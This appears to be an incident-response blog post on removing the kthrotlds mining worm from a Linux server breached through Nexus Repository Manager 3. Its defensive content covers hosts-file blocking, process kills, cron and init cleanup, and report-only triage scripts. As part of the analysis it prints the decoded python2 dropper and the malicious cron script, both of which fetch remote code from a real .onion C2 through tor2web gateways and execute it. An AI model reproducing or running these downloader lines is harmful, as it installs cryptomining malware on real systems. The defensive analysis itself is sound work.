Server infected with a virus
After going through various sources, it turned out that old versions of ThinkPHP, Supervisord and Nexus Repository Manager 3 have vulnerabilities. I had installed Maven Nexus 3, and that vulnerability was used to break in. This is the variant: kthrotlds.
First, look at what is suspicious in the process list (top):
ps -aux --sort=-pcpu|head -10
Result: a python2 process directly exec()ing code decoded from a base64 string.
Decode the base64 to see what is inside:
#coding: utf-8
import base64
import urllib2
import ssl
# Same .onion C2, reached through three different tor2web gateways.
HOST="https://an7kmd2wp4xo7hpr"
RPATH1="src/sc"
d1=HOST+".onion.pet/"+RPATH1
d2=HOST+".onion.ws/"+RPATH1
d3=HOST+".onion.ly/"+RPATH1
def ld(url, t):
    # TLS certificate and hostname verification are switched off.
    try:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    except Exception:
        ctx=False
    # The next stage is itself base64; it is decoded in memory, never written to disk.
    if ctx:
        page=base64.b64decode(urllib2.urlopen(url,timeout=t,context=ctx).read())
    else:
        page=base64.b64decode(urllib2.urlopen(url,timeout=t).read())
    return page
# Try the gateways in order; each fetched stage is exec()ed straight away.
try:
    try:
        page=ld(d1, 175)
        exec(page)
    except Exception:
        page=ld(d2, 175)
        exec(page)
except Exception:
    page=ld(d3, 175)
    exec(page)
pass
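The dropper above builds its C2 URLs from three pieces (HOST, a tor2web gateway suffix, RPATH1) and exec()s whatever comes back, so the safe way to triage such a `python2 -c` process is to decode the blob statically and pull the URLs out without ever running it. The following is an added example, not code from the original post: the onion address and path are the ones shown above, the stage stub it decodes is a constructed stand-in for the real payload, and the regexes assume the loader's `HOST+"suffix"+PATH` concatenation style. It also emits the /etc/hosts lines for the full hostnames, since /etc/hosts has no suffix matching.

```python
"""Static triage of a python2 -c "exec(base64.b64decode(...))" loader.

Added example, not code from the original post. It never exec()s the
payload: it decodes it, pulls out the C2 host/path pieces the way the
page's dropper assembles them (HOST + gateway suffix + RPATH) and emits
/etc/hosts block lines for the full hostnames.
"""
import base64
import re

# Constructed sample: a stage-one stub modelled on the page's dropper. The onion
# address and path are the ones shown on the page; the stub body is our own
# minimal reconstruction, NOT the real payload.
SAMPLE_STAGE = r'''
import base64, urllib2
HOST="https://an7kmd2wp4xo7hpr"
RPATH1="src/sc"
d1=HOST+".onion.pet/"+RPATH1
d2=HOST+".onion.ws/"+RPATH1
d3=HOST+".onion.ly/"+RPATH1
exec(base64.b64decode(urllib2.urlopen(d1,timeout=175).read()))
'''
# What the loader looks like in a ps listing (constructed from the stub above).
SAMPLE_CMDLINE = (
    "python2 -c import base64;exec(base64.b64decode('"
    + base64.b64encode(SAMPLE_STAGE.encode()).decode()
    + "'))"
)

B64_RE = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# NAME="literal" assignments and NAME=A+"literal"+B concatenations.
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)
CONCAT_RE = re.compile(r'^\s*\w+\s*=\s*(\w+)\s*\+\s*"([^"]*)"\s*\+\s*(\w+)\s*$', re.M)
# Literal URLs; the host must contain a dot so the bare HOST prefix is not counted.
URL_RE = re.compile(r"https?://[A-Za-z0-9\-]+(?:\.[A-Za-z0-9\-]+)+(?:/[^\s\"']*)?")


def extract_stage(cmdline):
    """Decode the first base64 blob passed to b64decode() in a command line; None if absent."""
    m = B64_RE.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-8", "replace")


def extract_urls(source):
    """Collect C2 URLs: literal URLs plus HOST+suffix+PATH concatenations resolved."""
    consts = dict(ASSIGN_RE.findall(source))
    urls = set(URL_RE.findall(source))
    for left, middle, right in CONCAT_RE.findall(source):
        if left in consts and right in consts:
            urls.add(consts[left] + middle + consts[right])
    return sorted(urls)


def hostnames(urls):
    """Full hostnames of the URLs (scheme and path stripped)."""
    return sorted({re.sub(r"^https?://", "", u).split("/")[0] for u in urls})


def hosts_block_lines(names):
    """One exact-FQDN line per name; /etc/hosts does no suffix or wildcard matching."""
    return ["127.0.0.1 " + n for n in names]


if __name__ == "__main__":
    stage = extract_stage(SAMPLE_CMDLINE)
    urls = extract_urls(stage)
    print("\n".join(urls))
    print("\n".join(hosts_block_lines(hostnames(urls))))
```

Feed it the COMMAND column of the real ps line instead of SAMPLE_CMDLINE; if the decoded stage contains a further b64decode() of a literal, run extract_stage on that output again rather than executing anything.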
Tracing the malicious site:
https://an7kmd2wp4xo7hpr.onion.ws/src/sc
Next, look at the cron configuration (/etc/crontab and /etc/cron.d): there is an abnormal scheduled job. Its script:
wget="wget ";
if [ "$(whoami)" = "root" ];
then if [ $(command -v curl|wc -l) -eq 0 ];
then curl=$(ls /usr/bin|grep -i url|head -n 1); fi;
# Falls back to "echo" so the download chain fails silently if neither curl nor wget exists.
if [ -z ${curl} ]; then curl="echo "; fi;
if [ $(command -v wget|wc -l) -eq 0 ];
then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi;
if [ -z ${wget} ]; then wget="echo "; fi;
# Wipes /etc/hosts whenever it contains an ".onion." entry, i.e. it undoes any hosts-file blocking.
if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;
fi;
# Three more tor2web gateways, certificate checks disabled (-k / --no-check-certificate);
# the downloaded script is dropped to /root/.cache/.ntp and run with sh.
(${curl} -fsSLk --connect-timeout 26 --max-time 175 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /root/.cache/.ntp||
${curl} -fsSLk --connect-timeout 26 --max-time 175 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /root/.cache/.ntp||
${curl} -fsSLk --connect-timeout 26 --max-time 175 https://an7kmd2wp4xo7hpr.onion.market/src/ldm -o /root/.cache/.ntp||
${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=175 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /root/.cache/.ntp||
${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=175 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /root/.cache/.ntp||
${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=175 https://an7kmd2wp4xo7hpr.onion.market/src/ldm -O /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp
It also installed two system services packaged with Java Service Wrapper, cloudResetPwdAgent and cloudResetPwdUpdateAgent.
Now the cleanup ---------->>>
1. First, point the malicious domains at localhost so they can no longer be reached
vim /etc/hosts
--- block the garbage site
-- point onion.ws to localhost
127.0.0.1 localhost onion.ws
Caveat: /etc/hosts matches full hostnames only, with no suffix or wildcard matching, so an entry for onion.ws does not cover an7kmd2wp4xo7hpr.onion.ws. Add each full hostname seen above on its own 127.0.0.1 line: the .onion.pet, .onion.ws and .onion.ly names from the dropper and the .tor2web.io, .onion.sh and .onion.market names from the cron job. Do this only after the cron job from step 3 is gone: its script rewrites /etc/hosts to a bare "127.0.0.1 localhost" whenever it finds ".onion." in the file.
2. Kill the abnormal processes
# Kill the abnormal processes. busybox's own ps/grep/awk are used instead of the system
# tools, which may have been tampered with; in busybox ps output the first column is the PID.
# The 'python2' pattern kills every python2 process, so check the ps listing first
# that only the loader is running under that name.
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'python2' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep -i 'cloudResetPwdUpdateAgent' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep -i 'cloudResetPwdAgent' | busybox awk '{print $1}' | busybox xargs kill -9
3. Clean up crond and the crontab entries
# Stop the crond service
service crond stop
# Remove the scheduled-task files (the cron.d file has the immutable (i) attribute set, so clear it with chattr -i first)
chattr -i /etc/cron.d/root
busybox rm -f /etc/cron.d/root
chattr -i /var/spool/cron/root
busybox rm -f /var/spool/cron/root
Check the following locations carefully for any remaining abnormal scheduled jobs and delete them. Also remove the script the job downloads, /root/.cache/.ntp (clear its immutable bit the same way if rm refuses).
/var/spool/cron/
/etc/crontab
/etc/cron.d
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly
4. Clean up the autostart entries cloudResetPwdAgent and cloudResetPwdUpdateAgent
# Stop the rogue services
service cloudResetPwdAgent stop
service cloudResetPwdUpdateAgent stop
# Remove them from the boot sequence with chkconfig (--del also drops the rc*.d links; the rm lines below are belt and braces)
chkconfig cloudResetPwdAgent off
chkconfig --del cloudResetPwdAgent
chkconfig cloudResetPwdUpdateAgent off
chkconfig --del cloudResetPwdUpdateAgent
# Delete the init scripts and rc links
busybox rm -f /etc/init.d/cloudResetPwdAgent
busybox rm -f /etc/init.d/cloudResetPwdUpdateAgent
busybox rm -f /etc/rc.d/rc0.d/K80cloudResetPwdAgent
busybox rm -f /etc/rc.d/rc0.d/K80cloudResetPwdUpdateAgent
busybox rm -f /etc/rc.d/rc1.d/K80cloudResetPwdAgent
busybox rm -f /etc/rc.d/rc1.d/K80cloudResetPwdUpdateAgent
busybox rm -f /etc/rc.d/rc2.d/S20cloudResetPwdAgent
busybox rm -f /etc/rc.d/rc2.d/S20cloudResetPwdUpdateAgent
busybox rm -f /etc/rc.d/rc3.d/S20cloudResetPwdAgent
busybox rm -f /etc/rc.d/rc3.d/S20cloudResetPwdUpdateAgent
busybox rm -f /etc/rc.d/rc4.d/S20cloudResetPwdAgent
busybox rm -f /etc/rc.d/rc4.d/S20cloudResetPwdUpdateAgent
busybox rm -f /etc/rc.d/rc5.d/S20cloudResetPwdAgent
busybox rm -f /etc/rc.d/rc5.d/S20cloudResetPwdUpdateAgent
busybox rm -f /etc/rc.d/rc6.d/K80cloudResetPwdAgent
busybox rm -f /etc/rc.d/rc6.d/K80cloudResetPwdUpdateAgent
5. Confirm again that the process is gone
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
OK, cleaned up!! Restart cron
service crond start
Cleanup only removes the payload. The entry point was the vulnerable Nexus Repository Manager 3 install, so upgrade it (see references 4 and 5 below); otherwise the machine will simply be reinfected.
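Steps 1 to 5 touch cron, the init.d/rc*.d entries and /etc/hosts by hand; a sweep that checks the same places for the indicators shown on this page is useful to run before and after the cleanup, and again after the next reboot. This is an added example, not the post's own script: the indicators are the gateway names, the /root/.cache/.ntp path and the cloudResetPwd*Agent service names shown above, the `root` argument lets it run against any tree, and the sample tree it builds is constructed for offline use. It only reports; removal stays with chattr -i and rm as in the steps above.

```python
"""Persistence sweep for the kthrotlds cleanup on this page (added example).

Walks the cron locations, init.d/rc*.d entries and /etc/hosts from steps 1-5
and reports anything matching the indicators the page shows. Report-only.
"""
import os
import re
import tempfile

# Indicators taken from the cron job and service names shown on the page.
CRON_IOCS = re.compile(r"\.onion\.|tor2web|/root/\.cache/\.ntp|/src/ldm")
SERVICE_IOCS = re.compile(r"cloudResetPwd(Update)?Agent|kthrotlds", re.I)

CRON_LOCATIONS = [
    "etc/crontab", "etc/cron.d", "etc/cron.hourly", "etc/cron.daily",
    "etc/cron.weekly", "etc/cron.monthly", "var/spool/cron",
]
RC_LOCATIONS = ["etc/init.d"] + ["etc/rc.d/rc%d.d" % n for n in range(7)]


def _files_under(path):
    """Yield a file itself, or the direct entries of a directory; nothing if absent."""
    if os.path.isfile(path) or os.path.islink(path):
        yield path
    elif os.path.isdir(path):
        for name in sorted(os.listdir(path)):
            yield os.path.join(path, name)


def scan_cron(root="/"):
    """(file, matching line) pairs for cron entries that hit CRON_IOCS."""
    hits = []
    for loc in CRON_LOCATIONS:
        for f in _files_under(os.path.join(root, loc)):
            try:
                with open(f, errors="replace") as fh:
                    for line in fh:
                        if CRON_IOCS.search(line):
                            hits.append((f, line.strip()))
            except OSError:  # unreadable, a directory, or a dangling link
                continue
    return hits


def scan_rc(root="/"):
    """init.d scripts and rc*.d links whose names match SERVICE_IOCS."""
    hits = []
    for loc in RC_LOCATIONS:
        for f in _files_under(os.path.join(root, loc)):
            if SERVICE_IOCS.search(os.path.basename(f)):
                hits.append(f)
    return hits


def hosts_blocks(root="/", names=()):
    """Which of `names` are pinned to 127.0.0.1 in etc/hosts (exact names only,
    which is why a bare onion.ws entry does not cover the full gateway hostname)."""
    pinned = set()
    try:
        with open(os.path.join(root, "etc/hosts")) as fh:
            for line in fh:
                parts = line.split("#")[0].split()
                if parts and parts[0] == "127.0.0.1":
                    pinned.update(parts[1:])
    except OSError:
        pass
    return {n: (n in pinned) for n in names}


def build_sample_root():
    """Constructed infected tree for offline runs; NOT a real capture."""
    root = tempfile.mkdtemp()

    def put(rel, text):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as fh:
            fh.write(text)

    put("etc/crontab", "0 * * * * root run-parts /etc/cron.hourly\n")
    put("etc/cron.d/root", "*/15 * * * * root curl -fsSLk https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm"
        " -o /root/.cache/.ntp && sh /root/.cache/.ntp\n")
    put("var/spool/cron/root", "# empty\n")
    put("etc/init.d/cloudResetPwdUpdateAgent", "#!/bin/sh\n")
    put("etc/init.d/sshd", "#!/bin/sh\n")
    os.makedirs(os.path.join(root, "etc/rc.d/rc3.d"))
    os.symlink("../../init.d/cloudResetPwdUpdateAgent",
               os.path.join(root, "etc/rc.d/rc3.d/S20cloudResetPwdUpdateAgent"))
    put("etc/hosts", "127.0.0.1 localhost onion.ws\n")
    return root


if __name__ == "__main__":
    r = build_sample_root()
    for f, line in scan_cron(r):
        print("cron:", f, "->", line)
    for f in scan_rc(r):
        print("rc:", f)
    print(hosts_blocks(r, ["onion.ws", "an7kmd2wp4xo7hpr.onion.ws"]))
```

Run it with root="/" on the real box; files it reports that rm cannot delete are the ones still carrying the immutable bit, which chattr -i clears as in step 3.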
References:
1. Notes on emergency response to a DDG mining variant on Linux
https://www.tuicool.com/articles/U3UBjeN
2. Cleaning up the Watchdogs mining worm variant kthrotlds and its further variant kpsmouseds
https://www.jianshu.com/p/9f24ade3f462
3. A difficult trojan hunt on CentOS
https://www.dwhd.org/20150908_191437.html?mType=Group
4. Nexus Repository Manager 3 remote code execution (CVE-2019-7238): analysis and exploitation
http://521.li/post/107.html
5. Threat alert: three new Nexus Repository Manager vulnerabilities already used to spread mining trojans
https://www.freebuf.com/vuls/197200.html